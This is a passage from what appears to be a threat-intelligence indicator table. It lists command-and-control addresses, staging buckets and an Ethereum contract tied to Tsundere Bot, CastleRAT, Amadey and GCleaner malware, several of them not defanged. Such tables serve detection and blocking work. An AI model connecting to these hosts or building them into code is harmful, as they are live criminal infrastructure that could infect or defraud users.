gitempire.s3...backblazeb2[.]com | Commodity Cloud Staging Bucket | [1],[2] |
elvenforest.s3...backblazeb2[.]com | Commodity Cloud Staging Bucket | [1],[2] |
ws://185.236.25.119:3001 | Tsundere Bot WebSocket C2 Endpoint (via Ethereum smart contract) | [14],[17] |
0x2B77671cfEE4D5EE6652E63bc9776A2EaFdbb7ee | EtherHiding Ethereum Smart Contract (blockchain C2 lookup) | [14],[17] |
172.86.123.222 / 23.94.145.120 | CastleRAT C2 IP Addresses | [10],[6],[20] |
158.94.208[.]6 | Amadey Bot C2 Server | [6],[20] |
194.38.20[.]224 | GCleaner PPI Distribution Server ("mixeleven" campaign) | [6],[20] |
172.86.126.208 | Stagecomp Hosting & C2 (co-located with stats-coinbase[.]com crypto-drainer) | [4] |
140.82.18.48 | CastleRAT C2 IP Address (Chain 10) | [5] |